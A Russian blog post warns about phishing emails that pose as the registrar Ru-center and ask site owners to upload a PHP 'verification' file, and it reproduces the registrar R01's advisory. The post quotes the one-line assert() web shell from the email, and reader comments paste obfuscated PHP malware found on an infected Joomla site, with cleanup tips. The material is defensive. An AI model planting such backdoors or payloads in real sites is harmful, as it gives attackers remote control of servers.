View Sidebar
Яндекс.Метрика
 
Фишинговая рассылка от имени Ru-center

Фишинговая рассылка от имени Ru-center

24.12.2016 11:284 комментария

В начале недели я получил письмо якобы от имени регистратора доменных имен Ru-center.

Письмо оформлено в корпоративном стиле регистратора. В письме в кратчайшее сроки предлагается разместить некий файл на своём сайте. Цель одна – получить доступ к сайту.

К слову сказать, к атакуемому сайту уже лет пять не имею никакого отношения, но почту мою где-то нарыли.

phishing-spam

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом **** осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим содержимым:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

ru-center-phishing

Код состоит всего из одной строки:
assert(stripslashes($_REQUEST[RUCENTER]));
assert - аналогично eval исполнит PHP-код, переданный в переменной RUCENTER

Как выяснилось, аналогичные письма приходят и от имени Роскомнадзора.

rkn-phishing

 

А вот, что по этому поводу пишет регистратор R01:

Уважаемый администратор!

Некоторые администраторы доменных имен получили письма от имени R01 c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом.

Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.

Чтобы не стать жертвой мошенничества:

• никогда не загружайте вложения и не устанавливайте внешние файлы;
• в случае малейших подозрений — уточняйте информацию в службе поддержки.

Будьте бдительны!

Сообщение от R01

Повторюсь: Будьте бдительны!

4 комментария

  • Спасибо за информацию. Жаль, раньше не посмотрел, скажите, что будет если я по глупости такой файл разместил, правда всего на одни сутки, потом удалил? Насколько это критично? Благодарю заранее, если ответите.

    • Konstantin

      За это время хакер мог заразить ваш сайт. Загрузить на сервер свои скрипты или добавить свой код в существующие.
      Надо проверять теперь все файлы на сервере на наличии модификаций, появления новых файлов.
      Или можно убить весь сайт, удалить все, и восстановить его из незаряженной копии.

  • Александр

    Если вдруг кому повезло и он залил себе файл и Ваша cms джумала ищите посмотрите по этому пути
    ваш сайт/docs/templates/ваша тема/warp/systems/joomla/layouts/head.php
    должно быть что-то вроде такого кода удаляем его.

    <meta charset="document->getCharset(); ?>">

    get('responsive', true)): ?>

    -

    <link rel="apple-touch-icon-precomposed" href="url('theme:apple_touch_icon.png'); ?>">

    Соответственно удаляем файл a12tafm4a4dfj94m.php с содержанием из корневой директории.

    Смотрим серверные файлы .htaccess он их перезаписывает
    Далее ищем файлы с названиями index.php head.php site.php итд смотрим содеражание если присутствует код типа <?php $X4d = "\x63\x68\x72"; $i8 = "\x69\x6e\x74\x76\x61\x6c"; $Sc = "\x61\x72\x72\x61".$X4d($i8($X4d($i8("\x34\x39"))."\x32\x31"))."\x5f\x6d\x6

    он обычно встает в начале файлов удаляем.

    возможно появление файлов 139c.txt с содержанием в закодированном формате тоже удаляем.
    Также возможно и расположение в файлах css

  • Александр

    возможно такой код //###=CACHE START=###
    error_reporting(0);
    $strings = "as";$strings .= "sert";
    @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY2EyqT9xp3EdpaIwoF5lqF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvAzMyMwV4AwyvATZ5ZTMzZmN4ZzL3LGqzAJAxATIvBQZvYvExYvE1YvEwYvVkVvx7PzyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcVQ09VQRcVUfXWTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPE1pzjcBjc9VTIfp2IcMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxpzImqJk0VQ0tL3IloS9yrTIwXPEwnPx7PzA1pzksL2kip2HbWTAbXGfXWTyvqvN9VPElMKA1oUD7Pa0tMJkmMFO7PvEzpPN9VTMmo2Aeo3OyovtvMTI0o2EmqTclqJAgYaW1VvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVwMzMJLlBQL5LwEwBGOzMwZjBQWzA2R3MwIwMQEyLwtmVv4xMP4xqF4xLl4vZFVcYvVtFSEHHP8kYwSppykhVwfXVPNtVPEiqKDtYw0tVxuip3D6VTEyqT9xp3EdpaIwoF5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwWyZwyvZGL4VvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
    //###=CACHE END=###

Leave a reply to Greg


css.php